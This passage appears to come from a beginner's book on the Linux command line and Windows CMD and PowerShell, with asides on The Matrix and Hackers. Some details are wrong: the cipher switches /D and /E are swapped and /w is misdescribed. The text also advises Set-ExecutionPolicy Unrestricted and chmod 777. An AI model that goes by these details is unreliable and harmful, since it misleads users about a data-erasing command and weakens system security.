than use wget. The example command below shows how to download the
latest version of Ubuntu (16.04).
username@ubuntu:~$ wget http://releases.ubuntu.com/16.04/ubuntu-
16.04-desktop-amd64.iso?_ga=1.77023125.1846713753.1467201332
Figure 22. Downloading Ubuntu with wget
Presumably you have no real need to do this, but any file of any size can be
downloaded. Wget has more functions than just downloading files. On a
software project wget was just to transmit commands across systems to bypass
the firewall. It was an application of wget I did not approve of. An alternative
to wget is cURL, which performs almost exactly the same.
scp
With the command SCP or Secure Copy users can move files to and from
different host computers. Essentially SCP starts a SSH connection (like Telnet,
but encrypted), then performs the desired file transfer and immediately closes
the connection when the transfer is finished. SCP is not always a convenient
command to use. Where possible I would advise the use of a GUI based file
transfer application such as FileZilla. Nonetheless, knowing this command is
important. The basic syntax is as follows
Copy a file from a remote host to your local computer
username@ubuntu:~$ scp your_username@remotehost.edu:foobar.txt
/some/local/directory
Copy a file from your local computer to a remote host
username@ubuntu:~$ scp foobar.txt
your_username@remotehost.edu:/some/remote/directory
You can also choose to copy two or more files at once, and designate the port
to do it with. You can also a copy a directory with the –r flag.
username@ubuntu:~$ scp -r foo
your_username@remotehost.edu:/some/remote/directory/bar
Copy a file from one remote host to another
username@ubuntu:~$ scp
your_username@rh1.edu:/some/remote/directory/foobar.txt \
your_username@rh2.edu:/some/remote/directory/
SCP may not be technically difficult, but typing in the correct file and
directories names can be prone to typos. FileZilla is so much easier, but if
you’re working on an embedded system that has only a 400 MHz ARM
processor and only 64Mb of RAM you may not have a choice but use SCP. To
install FileZilla just execute the following two commands
username@ubuntu:~$ sudo apt-get update
username@ubuntu:~$ sudo apt-get install filezilla
Find Linux programs
find
If you can’t find the file you just downloaded with wget you can use the find
program to do so. An example would be:
username@ubuntu:~$ find / -name 'example.tar.gz’
The slash forward ‘/’ means that the find program should start looking from the
root folder down into all other system folders. If you have a better idea where
to find your file and want to speed up the search than write down the partial
directory instead. The switch -name means that we only want the command to
look at the filename for its search. Finally between two single quotes ‘ ’ we
give find the name or part of the name as a string for its search effort. Users
can attempt to auto-complete the finale name. Output for find could be as
follows
/home/username/Downloads/example.tar.gz
Figure 23. Find a file called my_file

Above is an example of the use of the find command. Note how I used sudo to
execute the command as root. If I don’t I will get a very long list of messages
telling me ‘Permission Denied’ to search a folder for a file.
Unzip Linux programs
I mentioned there are many archive extension for Linux. The most popular are
.tar and .gz and .tar.gz. These file extensions can be un -(zipped) -(tarred) with
the following commands.
tar
After you have downloaded a file with extension .tar.gz you can’t do much with
it. Most Linux operating systems allow you to unzip and untar a file with the
GUI by just double clicking on the file. The user is then questioned whether
extracting the file is desired. However, should you only have access to the
command line than tar is your goto program. It works for both .tar and .gz. Tar,
or tape archive is used to archive files into one folder. Often a compression
algorithm such as gzip is run afterwards to reduce the file size.
The tar command has its share of switches. This text will merely give an
overview of those that are needed to perform the most basic tasks. An example
follows of using the tar program on a hypothetical file called example.tar.gz
that we just downloaded using wget.
username@ubuntu:~$ tar –xvzf example.tar.gz
The switch –x means that we wish to extract the file. Note that it is the first
switch. –v will give us an overview of the all the files that are extracted, it can
be omitted for brevity. –z will decompress the file using gzip. This is an
example of a program calling a program through a switch rather than a pipe. –f
is the last switch, it tells tar the name and path of the compressed file.
gzip and gunzip
Of course you can also use the gzip program on its own in the command line to
decompress files. To do so you use the command gunzip (GNU unzip - get it)
followed by the filename.
username@ubuntu:~$ gunzip example.tar.gz
Open and run a Linux program
After you have downloaded a program and unpacked its binaries you can
attempt to run it. Linux can only run files that can be found in your classpath,
$PATH. For example, using the command ls, which is actually a little program
will tell Linux to run a file called ls if it is in your $PATH. It of course is,
otherwise you would not have been able to run the program and see the results
as it lists all files in the directory you are currently in.
To see what your current $PATH is just type ‘echo $PATH’. You should get a
result like the following line
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
At first this look like something a program may spit out as an error message
when it has a bad day, but you will remember these directories from chapter 0.
It is the location of all the binaries (runnable code). Shell looks into these
directories for the program you entered In this case some 6 folders are
searched.
/usr/local/sbin:
/usr/local/bin:
/usr/sbin:
/usr/bin:
/sbin:
/bin
Now, for all those executable code that is not part of your $PATH you need to
explicitly mention in the command the exact location for the shell to find it.
Assuming that you have navigated with the command line argument cd to the
correct folder you need to type in ./programname to run the executable.
cat
With the cat command we can open a file in a text editor. Of course this is not
the same as running a program. If we were to open a source code file of a
program we would see the incomprehensible binary code displayed, but for
other purposes it can be useful. The cat output is displayed in the terminal.
gedit
To make any permanent changes to files you will need to use a text editor. They
come into two varieties. Those that have GUIs and those that output to the
command line. Gedit is a simple text editor that can be found on operating
system featuring the GNOME desktop environment. Ubuntu has gedit installed
as the default editor. On Kali Linux you will have to use the Aptitude repos to
install it.
Gedit may not have many features, but it is light-weight and it does have syntax
highlighting. If you open a file with a new file with gedit and use an
established extension with the filename that refers to a programming language
than you can use syntax highlighting. Syntax highlighting assigns nice candy
colors to certain parts of a programs language. It improves readability,
allowing quick debugging.
Below is an example of opening a file in gedit which has the extension ‘.c’. As
the file does not yet exist it will be created. The extension makes it clear this
will be a program written in C and appropriate syntax highlighting is used.
username@ubuntu:~$ gedit helloworld.c
In the blank file that appears as a pop-up input the following lines.
#include <stdio.h>
int main(void) {
printf("hello, world\n");
}
After you have finished typing press save to store the file. You have just
created your first program! As you may guess from looking at the code it will
print the words ‘hello, world’ to the command line. It is an example
popularized by authors Brian Kernighan and Dennis Ritchie in their book The
C Programming Language first published in 1978. In chapter 3 of Part 2 I will
go into detail on the C programming language. The example above is often
used to determine whether a compiler has been properly installed. The system
cannot as of yet run the code. The CPU only understands binary ‘010101’. We
first need to compile the source code to executable code. This is
accomplished with GCC, or GNU Compiler Collection, the default compiler
on Linux. GNU is quite versatile. It can also compile other languages ranging
from FORTRAN, Java to Objective C used with Mac OS X.
The following command executes gcc to create the executable code.
username@ubuntu:~$ gcc helloworld.c –o helloworld
If you use the list command ls you notice a file as has been added to your
directory besides helloworld.c. It is called helloworld. We could have called
it anything we, but generally it is better to name it after the source code file
(helloworld.c). In fact, if you specify no name at all (omit –o) gcc will create
the executable code and call the file a.out.
To run the code type in the following command. Don’t type the extension ‘.c’!
username@ubuntu:~$ ./helloworld
The output should simply be
hello, world
Figure 24. Editing, compiling and running a C program

If gcc didn’t complete the compiling you may have a typo somewhere. To give
you a clue what may have gone wrong I briefly tell you what the program does.
1. #include <stdio.h> - imports a library which contains code for the
function printf.
2. int main(void) { - starts the program and needs to be performed once for
every program written in C.
3. printf("hello, world\n") - prints the string to standard output.
4. } – closes the curly braces opened with the second line. Such braces are
often used in programming languages to delimit logic.
Advanced commands
I conclude this chapter with two commands that allow the user to see the
amount of system resources you are using. They can be important when you
download and unpack large files. Linux has a lot of neat commands that show
just what the system is doing. Below are several advanced ‘household’
command that
Du
The du or Disk Usage command shows the amount of space you on your hard
drive.
username@ubuntu:~$ du
Free –m
With this command you can see how much RAM your system is using. As most
modern laptop and desktop computers come with at least several Gb of RAM
memory you’re not quickly going to run out of space. However, the same
cannot be said for tablets, smartphone or embedded computers. The free –m
command show how much RAM memory you have left.
Figure 25. Example of Free -m
Figure 26. Carrie-Anne Moss as Trinity in The Matrix
EXTRA:
The Matrix:
God-Mode
When The Matrix was released in 1999 it marked the end of an era. For the
first time computer generated effects could hardly be distinguished from
reality. Yet, more than that, it fulfilled the desire of every gamer.
What if you had god-mode in a world that mattered?
The movie, directed by Lana and Lilly Wachowski, was inspired by works
such as Neuromancer by author William Gibson and Hong Kong action cinema.
The Wachowskis managed to add to that their own unbridled inspiration
culminating in many geeks (including myself) practicing their Kung Fu in front
of a mirror.
The Matrix is set in a world similar to our own, but different. Thomas
Anderson (Keanu Reeves) has always known this. By day he works as a
programmer at a dreary corporation, but by night he is hot-shot hacker going by
the handle Neo. One such night, he receives a mysterious invitation to a night
club where he meets a hacker named Trinity (Carrie-Anne moss). Together
with her colleagues Morpheus, Switch and Tank she manages to convince him
he lives in a computer generated reality. After they manage to free his mind
from this world, and his body from a slush tank the machines have kept him.
Now Neo can enter the computer world, The Matrix, whenever he wants. His
knowledge allows him to perform any kind of feat he wants. Yet, agents of the
machines also have special powers and will do anything to stop him from
freeing more people.
Figure 27. Keanu Reeves as Neo
The topic of simulated realities has been tried before in movies. Most are
mediocre at best: TRON, Source Code and Brazil. But a few such as Dark City
and The Matrix managed to hit the mark. If you want to know more about what
inspired the Wachowski’s read the aforementioned book Neuromancer and the
other works of William Gibson. Another excellent work is Neal Stephenson’s
Snow Crash featuring a samurai-wielding pizza courier who attempts to retake
his rightful place as the world’s best hacker. I would fail in my duties if I
didn’t recommend also Dan Simmons’s Hyperion, a story in which the good
guys don’t always win. In 2018 director Steven Spielberg will release his
movie adaptation of Ready Player One, a sci-fi novel by Ernest Cline. Cline
may well be one of the biggest geeks in the world. The story is about Wade
Watson, also known as Parzival, as he searches through OASIS, a Matrix
inspired digital universe for clues to solve the puzzle left by OASIS founder
James Halliday. Whoever solves the puzzle will get control of OASIS, which
explains why corporate entities are trying to kill Parzival. Ready Player One is
a veritable orgy of 80s references. Entire scenes from WarGames and Blade
Runner are played out. Not to mention the dozens of references to games such
as Zork, Pac-man and Joust as well movies such as Star Wars and the works of
John Hughes. As a hacker I can highly recommend the novel, and most of the
material referenced.
Figure 28. Neo meets Trinity

The Matrix spawned two sequels as well several games. I suggest you try
Enter The Matrix and Path of Neo. Both featured a hacking mini game using
commands inspired by the Windows CMD. Take a look at the commands
below and try them out on your Windows system. We will be revisiting
Windows as a side excursion a few more time in this book. Enter The Matrix
was released back in 2003 and its graphics have sadly not stand the test of
time, try out he PC version and don’t forget to patch it thoroughly to avoid the
square car tires.
Figure 29. An example of hacking in Enter The Matrix
CMD
The CMD, also known as CMD.exe or Command Shell is the windows
analogue of the Linux Shell. It can trace its origins back to the
COMMAND.COM interface of the original MS-DOS. CMD can at best be
described as a limited version of a Linux shell, it simply doesn’t offer the
breadth of functionality. This can be traced back to the proprietary nature of
MS-DOS and Windows. Please note that most CMD commands are NOT case
sensitive. It is convention that CMD command are often printed in upper case
letters but for most commands this is not necessary.
echo
The echo command prints any designated line as output onto the command line.
Quotes and ticks don’t matter, they will be printed as well.
Figure 30. The echo command in Windows
dir
The command dir stands for Directory. It is the equivalent to ls. The command
has numerous flags, type in /? after Dir to see them. /S would also print file
names in sub directories. I find the vanilla flavor dir command to suite me for
most purposes.
Figure 31. The directory listing command
copy
With copy you can move files around. The syntax if simple - copy hello.txt
[destination] – here the destination is a Windows directory and thus you have
to take into account the backwards slash. If you have a folder named Hello in
your present directory than the correct command would be
copy letter.txt C:\Users\Name\Hello
move
This command is very similar to copy, but it does not copy a file and retain the
original. Instead just like the Linux command mv it cuts a file or directory to
the designated directory
move letter.txt C:\Users\Name\Hello
ipconfig
No this command does not include typo, its name is similar to ifconfig from
Linux. In fact the commands do practically the same thing. You get an overview
of all your network connections and you can discover you own IP address.
Placing the switch /? gives and overview of possible options to include. Add
/all for a very verbose overview of your network connections.
ping
With ping you can easily check the internet connection and see what your speed
it. Unlike the Linux equivalent the Windows version stops after four packet
roundtrips. The time it takes in milliseconds for a roundtrip to complete gives
a good indication of your internet speed. Below Google.com is used as an
example
Figure 32. Ping on google
tracert
With the tracert you can get overview of all the hops (routers) your internet
connection makes. It is a good tool to find out if a remotely server is down or
whether your connection is making unnecessary hops. Just like ping you can
designate the server you which to contact. In essence it is a verbose version of
ping.
Figure 33. Tracert on google
cipher
When you delete a file on windows only the header to that file is removed.
With tools you can reconstruct that header and read the files you intended to
delete. To prevent this you can use cipher, which is normally used to encrypt a
file. Once the header has been removed cipher will overwrite the entire romp
of the file with garbage data, making retrieval impossible. I should warn that
this command can screw things pretty well if you get it wrong. Below are three
commonly used variations of cipher.
Example Purpose
C:\Users> cipher /w:directory Delete all data in that directory for good
C:\Users> cipher /D:directory Encrypt all data in that directory
C:\Users> cipher /E:directory Decrypt all data in that directory
These series of commands along with Change Directory should allow you to
find your way around Windows. We will revisit the Windows command line
again. Its successor, Windows PowerShell will also be featured as well as
Batch programming. That way you gain a broad knowledge base.
Chapter 3 Advanced Linux Commands
After going through three chapters of Linux commands you should have
developed a grasp of how you can perform most of your chores through the
terminal. Yet, a lot of tasks rely on multiple commands chained together, this
can be done through the pipe | symbol. I already teased this feature in earlier
chapter but now we will delve into it properly. Readers will also learn how to
save output from a Linux command in a file. Finally this chapter will discuss
commands that show what is going with your Linux distribution under the hood
with commands such as ifconfig and dmesg.
Directing output
Output from a command can be used in two ways. It can be saved by
redirecting or appending it to a file or it can be used as input for a second
follow-up command through piping. Let’s start with saving output to a file.
There are two version: redirect and append.
Redirect
To save output from a command to a file rather than print it to the terminal add
the redirect symbol ‘>’ followed by the file name to our command.
username@ubuntu:~$ ps > processes.txt
The example above will save all output from the process command to a file
called processes.txt. If the file doesn’t exist yet it will be automatically
created. There is no need for the user to create it beforehand. However, the file
will be created in the current working directory, you can also choose to save
output to a file in another directory but you will need to define the full path.
Redirect overwrites all text in a file. Every time you called the command
above the list of processes in the text file will be overwritten.
Append
With two redirect symbols ‘>>’ users can append information they want to
save behind that what is already stored in a file. As you may guess, most
people use append.
username@ubuntu:~$ ps >> processes.txt
The two example above use the process command, but almost any Linux
command can have its output redirected.
Piping
As mentioned in the introduction to this chapter with piping we can chain
together multiple Linux commands. Such combinations can become very
powerful as your skills increase. Novice Linux users may want to keep away
from pipes and just type commands separately or even user a text file as input.
However, I dare you to try pipes. If at first you do not succeed…
username@ubuntu:~$ ps | grep bash
The example above pushed output from ps into the grep command that is
filtering out all process names that do not have bash in their name. Yet, this is a
trivial example. A more elaborate example of piping is as follows.
username@ubuntu:~$ ps aux | grep conky | grep -v grep | awk '{print
$2}' | xargs kill
1. ps aux will list all running processes, including ones that are not active.
The second column of output lists the process identifier or PID that can
be used to specify later on to kill a process.
2. grep conky acts as a filter for the processes, listing only those that have
the word conky in them. Oddly enough that includes our very command.
In order to prevent a situation whereby this command is stopped before
the process we intend to stop we need to exclude the one process that
also has the identifier grep.
3. grep -v grep does exactly that. Now we have a list of just one process.
4. awk '{print $2}' with this line we use the awk scripting language to
retrieve the second field of our output. More on awk later.
5. xargs will take input from the left side of the pipe and use it create a
command for kill. Like kill, commands such as cp and echo don’t know
how to use input from a pipe. In the end at the right side of the last pipe
the command kill PID is executed as the final step in this chained series
of commands.
Advanced commands and tools
Dhclient
One common problem with your network maybe that there is no IP address
assigned. With dhclient we can request and IP address from a router.
Ifconfig
The ifconfig tool is used to query the current state of your network. A bland
version of the command will output such information to the terminal.
username@ubuntu:~$ ifconfig
The output could something as follows.
eth0 Link encap:Ethernet HWaddr 78:a5:04:fd:c2:ac
inet addr:10.0.0.200 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::7aa5:4ff:fefd:c2ac/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1905 errors:0 dropped:0 overruns:0 frame:0
TX packets:170 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:505198 (493.3 KiB) TX bytes:22644 (22.1 KiB)
Interrupt:40
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX bytes:14043222 (13.3 MiB) TX bytes:14043222 (13.3 MiB)
usb0 Link encap:Ethernet HWaddr ba:d9:53:94:72:8f

inet addr:192.168.7.2 Bcast:192.168.7.3 Mask:255.255.255.252
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Here eth0 is your Ethernet connection. However, ifconfig can also be used to
configure you’re current connection. With the up and down switches you can
turn your internet drivers on or off.
username@ubuntu:~$ ifconfig [up][down]
/proc
As you may have guessed /proc/ is not a command or tool. Instead, it is a
directory in which the system keeps important files on system memory,
mounted devices, hardware configurations and more. /proc is in fact a virtual
filesystem in that it contains information only on runtime. A number of previous
commands I explained are little more than calls on virtual files that exist in
/proc.
cpuinfo
Linux makes use of virtual files to store the current state of your machine.
These can be found in the /proc/ folder. Cpuinfo is one of those and as the
name might suggest outputs information regarding your computer processor.
Information includes the number of cores, threads and processor speed.
username@ubuntu:~$ cat /proc/cpuinfo
filesystems
username@ubuntu:~$ cat /proc/filesystems
This will list the filesystems supported by your kernel
meminfo
username@ubuntu:~$ cat /proc/meminfo
This displays a summary of how the kernel is managing your system memory
version
username@ubuntu:~$ cat /proc/version
Linux version 4.2.0-23-generic (buildd@lcy01-30) (gcc version 5.2.1
20151010 (Ubuntu 5.2.1-22ubuntu2) ) #28-Ubuntu SMP Sun Dec 27
17:47:31 UTC 2015
This displays a summary of your system kernel and the compiler used to build
the kernel. Some information you may recognize from the uname –a command.
/dev
The dev folder on Linux is interesting in that it shows everything on Linux is
indeed a file. If you navigate to /dev and use ls –l you will see what I mean.
You should see you hardrive partitions represented as sda1, sda2 etc. There
should be more, you may also note you DVD drive. With cat /boot/vmlinuz >
/dev/dsp you should even hear some sound coming from you speaker. It is the
sound of your kernel. With the following two commands you will be able to
output to your terminal everything the kernel does. This will become
invaluable for debugging purposes.
Dmesg
With dmesg (display message) you can easily print the message buffer of the
kernel. When the Linux operating system starts the kernel start the device
drivers. As the system is booting any messages from the drivers will pass by
the screen too fast for anyone to read. So with dmesg you can read them. For
ordinary use the command is useful to see if a hardware device has been
successfully attached. Unplugging you’re mouse or keyboard while you are
reading this should cause dmesg to print out this fact the next time you run it.
username@ubuntu:~$ dmesg
As you may see the amount of output is not trivial, it will obscure your
previous commands for many pages. We can use the tail function to limit
output.
username@ubuntu:~$ dmesg | tail
This will ensure only the last 10 kernel messages are printed. There is also a
corresponding head function which will filter out all but the first 10 messages.
Both head and tail are easily usable with other commands as well in
combination with a pipe |.
To sum up, dmesg is a wonderful diagnostic tool. It shows you if something
goes wrong with your hardware drivers and the language is easily
understandable. If you ever request help on the internet about a problem you
can do a lot worse than showing them dmesg output.
Cu
With cu you can connect to another UNIX system. These days cu is hardly used
for that purpose. Instead it is used to read information about all ongoing non-
network connections. Examples could include serial connections using USB,
for a TV, hobby PC or even a smart meter. I use cu to just perform diagnostics
and see if any usable information is coming through. An example is reading
data coming from a smart meter.
username@ubuntu:~$ cu -l /dev/ttyUSB1 -s 9600 --parity=none
The meter was connected to my USB. With –l I indicate I have a special
location I want to cu to listen to and with –s I set the speed of the connection.
In this case it was 9600 baud. Cu would not output anything coming through the
connection onto the terminal.
Running applications in the background
Finally there are two optional commands that can be used to start an
application that is interesting for power users. The first option, the ampersand
sign & forces an application to run in the background if added. This is helpful
if you want to continue working in your current Terminal.
username@ubuntu:~$ ./program &
The second command, nohup, ensures that an application is not stopped when
you log out but keep your computer running. This is helpful if you want to run
an application continuously to make it accessible to others or if it is
performing difficult calculations. If you switch off your computer the program
does stop and won’t restart without the user starting it.
username@ubuntu:~$ ./program &
Nohup literally stands for no hang up. An alternative to nohup is the use of
screen. With screen you can run a command in a different user session. Yet
screen is not recommended for beginners. Of course both nohup and ampersand
also works. An application will run in the background and continue if you log
out.
On AWK
Awk is a programming language in which you can create very small programs
to help you parse and extract text from files. There are some similarities to
grep, but awk is a lot more diverse. Awk is one of those UNIX staples just like
sed (upcoming paragraph) that refuses to die. Chances are you may never need
awk, but if a programmer before you created a little script with it you may
need to adjust for a special purpose. So let’s try awk. First write a small .txt
document with gedit that contains a few sentences. For example the following
two sentences will just fine.
You will be a Linux awk in no time,
Especially if you also learn sed
With awk we can choose precisely what we want to read from a text and use
that as input for something else, but first let’s try to return everything.
username@ubuntu:~$ awk ‘{ print }’ test.txt
Now both lines are printed in full. Note the spaces around the word print! They
also need to be included. We can also choose to return just the first column.
Imagine every word in both sentences has its column just like an excel file.
username@ubuntu:~$ awk ‘{ print $1 }’ test.txt
In this awk sequence $1 stands for column 1. The results of this command is
You
Especially
This reveals that awk is well suited to alter data files. Imagine reading a
spreadsheet file with awk. We can also return more than one column with awk.
With awk ‘{ print $1, $2 }’ test.txt we return the first two. With awk ‘{ print
$1.$2 }’ test.txt we specify we want the output concatenated so the first two
columns are returned as though they were one word.
Youwill
Especiallyif
Awk performed these commands with the understanding that whitespace
delimited every word in our file. Plenty of other delimiters are possible. To
use them we need to specify them as whitespace is used as the default. To use
the comma as delimiter, use
username@ubuntu:~$ awk -F',' '{ print $1,$2,$3 }' test.txt
With the switch –F we specify that we want to separate fields using a special
delimiter.
Awk can also accept more elaborate criteria to extract parts of a text. A useful
way to do that is through regular expression which I elaborate in the next
paragraph. If we want to return every sentence that doesn’t a special characters
such as comma’s, exclamation or question marks the following regular
expression can be used.
username@ubuntu:~$ awk '/[ \^$.,|?*+()]/ { print }' test.txt
More complicated awk commands can be saved in special scripts. Remember,
awk is a fully functional programming language: it has variables, loops and
conditional statements. You can place the following lines in file with .awk as
extension
#!/usr/bin/awk -f
BEGIN {
x=1
while (x <= 5) {
if (x == 4) {
{print "Hello, World!"}
}
x++
}
}
After you have saved it you can run the program as follows
username@ubuntu:~$ awk -f testscript.awk
On SED
With sed or Stream Editor users can easily parse and transform text. It is a
scripting language, essentially a programming language that makes interaction
with the system easy. Sed has been around since 1974 and is based on an even
older scripting called qed. With sed we can use regular expressions to search
and transform a text. Regular expressions are well established text search
patterns that are available across many operating systems and programming
language. The sed language doesn’t have to be typed into the command line,
you can also write them down in a file just like awk. So let’s try out sed. A
simple sed command is word substitution. With the following command we
change every instance of the word dog into cat and place the output in a new
file.
Show below is the input. On the second line I have written down variations of
dog: capital letter, with and without a comma.
How much is that dog in the window
Dog, dog, Dog Doggie and cat
This is saved in dog.txt
username@ubuntu:~$ sed s/dog/cat/ < dog.txt > cat.txt
The output becomes
How much is that cat in the window
Dog, cat, Dog Doggie and cat
Notice the use of both redirect signs < and >. I could have used a variation
using the cat command
username@ubuntu:~$ cat dog.txt | sed s/dog/cat/ > cat.txt
Regular expressions are not everyone’s favorite topic. With the advent of GUI
text editors they have fallen in disfavor for manual command line use, but
programs still use them. Sed may be a programming language in that it has
Boolean statements, loops and conditions but it is not generally used to write
complicated applications. Sed scripts are used when work becomes
complicated or repetitive. Nonetheless, a few die-hards have created games
such as chess and Tetris using sed.
Figure 34. Hackers 1995
EXTRA:
Hackers:
Too Cool To Die
Just like The Net, also from 1995, Hackers became an instant cult-classic. The
movie stars Jonny Lee Miller as hacker Dade Murphy A.K.A Crash Override
and Angelina Jolie as Kate Libby A.K.A Acid Burns. The two quickly develop
a mutual competition and the movie follows their antics such as taking down a
large corporation and harassing the secret service. Hackers does fall
significantly short of greatness. The often slapstick humor and the dated fashion
made it feel obsolete within a few years of its release, especially compared to
The Matrix. Yet, it is also a wonderful trip down memory lane for those who
grew up in the 90s. Hackers correctly depicts the tactics used by the US Secret
Service in trying to pursue computer vigilantes.
Figure 35. Jonny Lee Miller as Crash Override
The movie nonetheless has themes and issues that are relevant even after 20
years. The character The Plague points out that the most commonly used
passwords are God, Sex, Love and Secret. Now, most systems require at least
one capital letter and number as part of the passwords key strength. So in
theory a valid password could be Secret1. That won’t give most hackers a
problem using software such as Hydra.
Figure 36. Acid Burns displaying her skillz

The reference to RISC CPU design becoming dominant for Desktop computers
did not come true. Implementations such as SPARC were defeated by Intel’s
deeper pockets which allowed it to update its Pentium designs faster than any
of its competitors. RISC is still around, nearly all embedded computers and
smart phones use RISC. SPARC has seen a revival, but mostly in high-end
supercomputers. Just like in The Net Kate (Acid Burns) uses a Mac
PowerBook Duo 270c with a 33 MHz processor, 4 Mb RAM and a color
screen! A far cry from the powerful computer she claims it to be.
Figure 37. Angelina Jolie as Acid Burns

Hackers may not be great, but it is good enough for a revisit. Just stay clear of
its unofficial sequels such as Takedown. The only thing that has remained
edged on my mind are the songs Halycon On and On by Orbital and One Love
by Prodigy. Together they symbolize growing up in the mid 90’s, in a world
moving from portable CD players to the Internet. Hackers recently saw it first
Blu-ray release marking its 20th anniversary. Check it out if you want to.
PowerShell
After going through almost 4 chapters on Linux and its command line I think
readers should be reminded of the possibilities that Windows offers. Most
readers who use Windows are familiar with the black screened CMD terminal,
but since the introduction of PowerShell in 2006 the Microsoft family of
Operating Systems now has their own tools for users to directly control their
system.
In 2006 Microsoft finally gave Windows professional users the tool they had
been long craving for – Windows PowerShell. Just like a Linux or Mac
command line it allows users to perform task automation and configuration
management. PowerShell comes with its own scripting language integrated
with the .NET framework. In PowerShell tasks are performed as cmdlets
(pronounced command-lets). These are .NET classes that can be combined
into scripts and executables.
In your Windows start environment you can find PowerShell by typing this in
the search bar, just like CMD. And Like CMD and Linux you can use most of
those commands in PowerShell. By typing in DIR or ls you should get an
overview of your present directory. The default directory is C:\Users\Name.
The PowerShell command equivalent to DIR is Get-ChildItem. Luckily we do
not need to type in the entire command, that would be too much effort. Typing
in gci suffices. Each commandlet has such an Alias.
Figure 38. Using DIR, LS and Get-ChildItem on the same directory
To make PowerShell print out Hello, World! just enter the following line
PS C:\Users\username> Write-Output “Hello, World!”
This will print the line to standard output in your shell. Most PowerShell
commands are written out in words, but there also exists a neat shorthand
version for each. Type in cgi to list files and directories and use write to print
a string to standard output.
If you use the Windows PowerShell environment as just another version of
CMD or as a Linux terminal on Windows you will miss many of the functions it
can offer. To create scripts you use PowerShell ISE. Open it and create a new
file. You can add the code Write-Output “Hello, World!” from above without
any additional command. You can add the line Sleep 5 to make the program
sleep for 5 seconds before ending and returning control to the command line[4].
Your first PowerShell program should look something like
Write-Host "Hello world!"
Sleep 5
Write-Host "Goodbye!"
Save it to Desktop and note the .ps1 extension the file has received. Before you
attempt to run the program you may have to set certain conditions. Restart
PowerShell as administrator (Right-click and select ‘Run as Administrator’.
Now input the following command and press Enter.
PS C:\Users\username> Set-ExecutionPolicy Unrestricted
Type in yes to confirm the rights. You can now start your first PowerShell
program. Navigate to Desktop and enter your program name. You can
autocomplete it with Tab which will also add ./
The program pretty much exactly does as you may guess. It display line 1,
waits for 5 seconds and then displays the second line before terminating. With
PowerShell you can now also chain commands together with pipes, something
CMD could not do.
Write-Host also has an Alias, it is the old CMD echo command. For clarity try
to use the full-length commandlet name when creating PowerShell scripts. That
will makes much clearer for other users of those scripts. If you need help with
a cmdlet use Get-Help. To see the help page for Get-Help you would input
Get-Help Get-Help
With PowerShell you can perform a number of household tasks. Below are a
few. Notice the pipes, just like in Linux. The first commandlet sequence lists
all running processes and outputs them into a new window through the Out-
GridView commandlet.
Get-Process * | Out-GridView
The following sequence lists the log files of your system
Get-ChildItem C:\ -Recurse -Include *.log | Out-GridView
-WhatIf and -Confirm switch
Just like Linux commands many PowerShell commandlet also have optional
switches. In fact, PowerShell itself comes with a set of switches that can be
used for any commandlet.
By placing –WhatIf behind a command it tells it not to execute, but instead tell
you what would happen if the cmdlet were run. In essence you are prototyping
a command. This allows you to test command without running them which
saves you the trouble of setting up your test criteria again. The example below
shows what would happen if I tried to kill a program.
First, start a program such as WordPad. It is a non-essential program. I usually
have a tile linking to it in my start page. After this is done I use the Get-Process
cmdlet to find the corresponding process.
As shown in the screenshot below on my PC at the time the process ID is 2092
and the ProcessName is simply wordpad. Afterwards I used the ID with the
cmdlet Stop-Process and the –WhatIf switch to see what would happen.
Figure 39. The -whatif switch detailed

If I really wanted to end the WordPad I would omit –WhatIf. Instead I replace
it with the –Confirm switch to make the system ask for permission in carrying
out this task.
Figure 40. The -Confirm switch follow-up
After I have confirmed the prompt the cmdlet will be run and WordPad should
stop instantly.
Chapter 4 Text Editors and Desktop
environments
Paragraph 1. File Permissions
1.1 chmod
Not every file in Linux is readily accessible. With superuser (root) you can
assign other users permissions for files. Options include whether they can read
file content, write file content and execute files (programs). The abbreviations
for these are RWX. As there are three types of users on Linux: user, group and
others you can set these rights for each of them. With ls –l you can check which
rights are currently set for a file. If you have root access but no permission
assigned to a file than the easiest command to execute is
username@ubuntu:~$ chmod 777 filename
This will assign all rights to all groups. However, doing this has a habit can
make you’re system less secure. So be careful to assign the proper rights to
each user. See the table below for an overview of possible numeric
combinations.
7 read, write and execute
6 read and write
5 read and execute
4 read only
3 write and execute
2 write only
1 execute only
0 none
1.2 chown
With chown we can change the user and /or group ownership of a file or
directory. As you may guess, this implicitly also changes the file permissions.
username@ubuntu:~$ chown root file
Changes file owner to root
username@ubuntu:~$ chown root /folder
Changes folder owner to root
username@ubuntu:~$ chown root:members file
Changes file owner to root and group membership to members
username@ubuntu:~$ chown root:members /folder

Changes folder owner to root and group membership to members
Chown can come with a number of flags; place these immediately before
declaring the new owner.
-R, used with folder to recursively change all files. –v for verbose output. –c
for verbose output only if changes were made.
Paragraph 2. Vi and EMACS
Up until now we have used gedit as the standard text editor. In fact, gedit is
also available for download on MAC OS X and Microsoft Windows. Despite
that, gedit may not be available for every Linux distribution. Even worse, if
you don’t have an internet connection you won’t be able to install it. It is thus
time to navigate to the bin folder to check which text editor is installed.
Chances are either Vi, Vim (Vi with a GUI), EMACS or NANO is installed. In
this chapter we will discuss Vi/Vim and EMACS, the two most popular text
editors for Linux and part of the ongoing text editor wars. EMACS can be
complicated to learn, some have suggested that users new to Linux should start
with Vi or Vim and so this paragraph is written in that order.
2.1 Vi/Vim
Vi is a text editor written Bill Joy and in development since 1976. All the
interaction with Vi occurs in the Terminal and cursor keys are used for
navigation. Just like gedit you can open a file even if it doesn’t exist yet by
naming one after the Vi command.
username@ubuntu:~$ vi hellovi.txt
What you will see is an empty file where every line starts with the tilde sign ~.
These won’t be part of the final file once saved.
Vi won’t allow you to type right away, but you can use cursor keys to scroll.
Instead press the ‘i’ button to insert your text. After you have finished typing or
altering a file press Escape to revert back. Notice that if you type something
now it will be displayed at the bottom of the Terminal almost like a command
line. Here you can enter hotkeys to tell Vi what you want to do with a file.
To save the file and exit Vi you can type in the following :wq. As you may
